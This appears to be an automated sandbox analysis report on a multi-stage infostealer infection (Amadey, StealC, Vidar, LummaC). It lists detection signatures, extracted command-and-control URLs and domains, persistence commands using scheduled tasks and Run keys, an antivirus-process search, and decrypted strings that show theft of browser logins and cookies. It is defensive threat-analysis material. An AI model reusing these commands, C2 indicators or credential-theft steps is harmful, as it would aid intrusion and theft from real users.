49.2.f6f4816752.exe.2f0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
27.3.new_v8.exe.124cff8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.3.new_v8.exe.124cff8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 1620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f6f4816752.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3744, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ProcessId: 5744, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 5548, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 1620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f6f4816752.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Jurisdiction.pif T, CommandLine: Jurisdiction.pif T, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 412, ParentProcessName: cmd.exe, ProcessCommandLine: Jurisdiction.pif T, ProcessId: 4900, ProcessName: Jurisdiction.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe, ParentProcessId: 1244, ParentProcessName: splwow64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ProcessId: 412, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 5548, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 412, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 3672, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1313486
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	Avira: detection malicious, Label: TR/AD.Stealc.cucnc

Found malware configuration

Source: 00000001.00000002.1758351370.0000000000841000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 6.2.stealc_default2.exe.f10000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 6.2.stealc_default2.exe.f10000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 36.0.RDX123456.exe.940000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["computeryrati.site", "goalyfeastz.site", "servicedny.site", "authorisev.site", "seallysl.site", "opposezmny.site", "faulteyotk.site", "contemteny.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\LgAmARwZ\Application.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RDX123456[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GOLD1234[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Offnewhere[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\shop[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\CC7V0PUTO3B4JOR1523VPRJQN904A.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\J4EDANXSATRMSXZUEQ.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GOLD1234[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\LgAmARwZ\Application.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\shop[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RDX123456[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 01
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 03
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 20
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 25
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetProcAddress
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: LoadLibraryA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: lstrcatA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: OpenEventA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateEventA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CloseHandle
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Sleep
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: VirtualFree
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetSystemInfo
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: VirtualAlloc
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HeapAlloc
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetComputerNameA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: lstrcpyA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetProcessHeap
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetCurrentProcess
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: lstrlenA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ExitProcess
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetSystemTime
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: advapi32.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: gdi32.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: user32.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: crypt32.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ntdll.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetUserNameA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateDCA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetDeviceCaps
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ReleaseDC
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sscanf
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: VMwareVMware
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HAL9TH
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: JohnDoe
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DISPLAY
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: http://185.215.113.17
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 00x00
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: !\|
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: /2fb6c2cc8dce150a.php
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: /f1ddeb6592c03206/
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: default_valenciga
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetFileAttributesA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GlobalLock
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HeapFree
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetFileSize
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GlobalSize
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: IsWow64Process
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Process32Next
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetLocalTime
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: FreeLibrary
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetVolumeInformationA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Process32First
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetLocaleInfoA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetModuleFileNameA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DeleteFileA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: FindNextFileA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: LocalFree
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: FindClose
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: LocalAlloc
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetFileSizeEx
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ReadFile
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SetFilePointer
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: WriteFile
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateFileA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: FindFirstFileA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CopyFileA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: VirtualProtect
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetLastError
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: lstrcpynA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: MultiByteToWideChar
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GlobalFree
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: WideCharToMultiByte
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GlobalAlloc
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: OpenProcess
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: TerminateProcess
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetCurrentProcessId
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: gdiplus.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ole32.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: bcrypt.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: wininet.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: shlwapi.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: shell32.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: psapi.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: rstrtmgr.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SelectObject
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BitBlt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DeleteObject
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateCompatibleDC
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdiplusStartup
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdiplusShutdown
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdipDisposeImage
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GdipFree
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CoUninitialize
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CoInitialize
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CoCreateInstance
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BCryptDecrypt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BCryptSetProperty
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BCryptDestroyKey
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetWindowRect
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetDesktopWindow
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetDC
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CloseWindow
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: wsprintfA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CharToOemW
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: wsprintfW
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RegQueryValueExA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RegEnumKeyExA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RegOpenKeyExA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RegCloseKey
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RegEnumValueA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CryptUnprotectData
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SHGetFolderPathA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ShellExecuteExA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: InternetOpenUrlA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: InternetConnectA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: InternetCloseHandle
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: InternetOpenA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HttpSendRequestA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HttpOpenRequestA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: InternetReadFile
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: InternetCrackUrlA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: StrCmpCA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: StrStrA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: StrCmpCW
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: PathMatchSpecA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RmStartSession
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RmRegisterResources
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RmGetList
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: RmEndSession
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_open
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_step
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_column_text
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_finalize
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_close
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3_column_blob
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: encrypted_key
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: PATH
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: NSS_Init
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: NSS_Shutdown
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: PK11_FreeSlot
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: PK11_Authenticate
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: C:\ProgramData\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: browser:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: profile:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: url:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: login:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: password:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Opera
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: OperaGX
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Network
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: cookies
